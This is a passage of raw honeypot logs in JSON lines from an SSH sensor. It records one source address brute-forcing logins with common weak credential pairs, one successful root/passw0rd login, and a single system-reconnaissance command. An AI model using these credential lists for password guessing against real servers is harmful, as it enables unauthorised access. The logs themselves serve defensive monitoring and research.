.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:36.320370Z","src_ip":"212.227.125.160","session":"cc2142c9aaae"}
{"eventid":"cowrie.login.failed","username":"amrita","password":"amrita","message":"login attempt [amrita/amrita] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:36.555730Z","src_ip":"212.227.125.160","session":"cc2142c9aaae"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:37.606910Z","src_ip":"212.227.125.160","session":"cc2142c9aaae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42916,"dst_ip":"1.2.3.4","dst_port":22,"session":"b99b0d972c60","protocol":"ssh","message":"New connection: 212.227.125.160:42916 (1.2.3.4:22) [session: b99b0d972c60]","sensor":"my-vps","timestamp":"2025-08-26T21:59:41.524054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:41.711149Z","src_ip":"212.227.125.160","session":"b99b0d972c60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:41.711913Z","src_ip":"212.227.125.160","session":"b99b0d972c60"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:42.035189Z","src_ip":"212.227.125.160","session":"b99b0d972c60"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:43.111996Z","src_ip":"212.227.125.160","session":"b99b0d972c60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38308,"dst_ip":"1.2.3.4","dst_port":22,"session":"15e42a56fe3d","protocol":"ssh","message":"New connection: 212.227.125.160:38308 (1.2.3.4:22) [session: 15e42a56fe3d]","sensor":"my-vps","timestamp":"2025-08-26T21:59:46.730326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:46.732872Z","src_ip":"212.227.125.160","session":"15e42a56fe3d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:46.781351Z","src_ip":"212.227.125.160","session":"15e42a56fe3d"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:47.005644Z","src_ip":"212.227.125.160","session":"15e42a56fe3d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:48.104791Z","src_ip":"212.227.125.160","session":"15e42a56fe3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33696,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3b422e21d17","protocol":"ssh","message":"New connection: 212.227.125.160:33696 (1.2.3.4:22) [session: d3b422e21d17]","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.226605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.237701Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.287838Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.494765Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:59:52.671313Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.672167Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.753237Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:52.754643Z","src_ip":"212.227.125.160","session":"d3b422e21d17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57292,"dst_ip":"1.2.3.4","dst_port":22,"session":"db3408bd4e4a","protocol":"ssh","message":"New connection: 212.227.125.160:57292 (1.2.3.4:22) [session: db3408bd4e4a]","sensor":"my-vps","timestamp":"2025-08-26T21:59:57.697414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:57.758301Z","src_ip":"212.227.125.160","session":"db3408bd4e4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:57.759096Z","src_ip":"212.227.125.160","session":"db3408bd4e4a"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:58.009364Z","src_ip":"212.227.125.160","session":"db3408bd4e4a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:59.087819Z","src_ip":"212.227.125.160","session":"db3408bd4e4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52702,"dst_ip":"1.2.3.4","dst_port":22,"session":"54290851c548","protocol":"ssh","message":"New connection: 212.227.125.160:52702 (1.2.3.4:22) [session: 54290851c548]","sensor":"my-vps","timestamp":"2025-08-26T22:00:03.305159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:03.306276Z","src_ip":"212.227.125.160","session":"54290851c548"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:03.356330Z","src_ip":"212.227.125.160","session":"54290851c548"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:03.565546Z","src_ip":"212.227.125.160","session":"54290851c548"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:04.614542Z","src_ip":"212.227.125.160","session":"54290851c548"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48088,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7dbdc9d38b7","protocol":"ssh","message":"New connection: 212.227.125.160:48088 (1.2.3.4:22) [session: c7dbdc9d38b7]","sensor":"my-vps","timestamp":"2025-08-26T22:00:08.671007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:08.672078Z","src_ip":"212.227.125.160","session":"c7dbdc9d38b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:08.722718Z","src_ip":"212.227.125.160","session":"c7dbdc9d38b7"}
{"eventid":"cowrie.login.failed","username":"gitlab-prometheus","password":"gitlab-prometheus","message":"login attempt [gitlab-prometheus/gitlab-prometheus] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:08.872812Z","src_ip":"212.227.125.160","session":"c7dbdc9d38b7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:10.136697Z","src_ip":"212.227.125.160","session":"c7dbdc9d38b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43474,"dst_ip":"1.2.3.4","dst_port":22,"session":"781bbc304976","protocol":"ssh","message":"New connection: 212.227.125.160:43474 (1.2.3.4:22) [session: 781bbc304976]","sensor":"my-vps","timestamp":"2025-08-26T22:00:14.492537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:14.493652Z","src_ip":"212.227.125.160","session":"781bbc304976"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:14.546116Z","src_ip":"212.227.125.160","session":"781bbc304976"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"kafka","message":"login attempt [kafka/kafka] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:14.704465Z","src_ip":"212.227.125.160","session":"781bbc304976"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:15.775503Z","src_ip":"212.227.125.160","session":"781bbc304976"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38860,"dst_ip":"1.2.3.4","dst_port":22,"session":"5af2809c190d","protocol":"ssh","message":"New connection: 212.227.125.160:38860 (1.2.3.4:22) [session: 5af2809c190d]","sensor":"my-vps","timestamp":"2025-08-26T22:00:20.027526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:20.028591Z","src_ip":"212.227.125.160","session":"5af2809c190d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:20.072865Z","src_ip":"212.227.125.160","session":"5af2809c190d"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:20.216369Z","src_ip":"212.227.125.160","session":"5af2809c190d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:21.267674Z","src_ip":"212.227.125.160","session":"5af2809c190d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65164,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb26ad0a39bd","protocol":"ssh","message":"New connection: 217.72.205.35:65164 (1.2.3.4:22) [session: fb26ad0a39bd]","sensor":"my-vps","timestamp":"2025-08-26T22:00:22.583957Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:22.585214Z","src_ip":"217.72.205.35","session":"fb26ad0a39bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34248,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf63674097be","protocol":"ssh","message":"New connection: 212.227.125.160:34248 (1.2.3.4:22) [session: cf63674097be]","sensor":"my-vps","timestamp":"2025-08-26T22:00:25.205400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:25.206367Z","src_ip":"212.227.125.160","session":"cf63674097be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:25.270504Z","src_ip":"212.227.125.160","session":"cf63674097be"}
{"eventid":"cowrie.login.failed","username":"alisson","password":"alisson","message":"login attempt [alisson/alisson] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:25.419991Z","src_ip":"212.227.125.160","session":"cf63674097be"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:26.472365Z","src_ip":"212.227.125.160","session":"cf63674097be"}
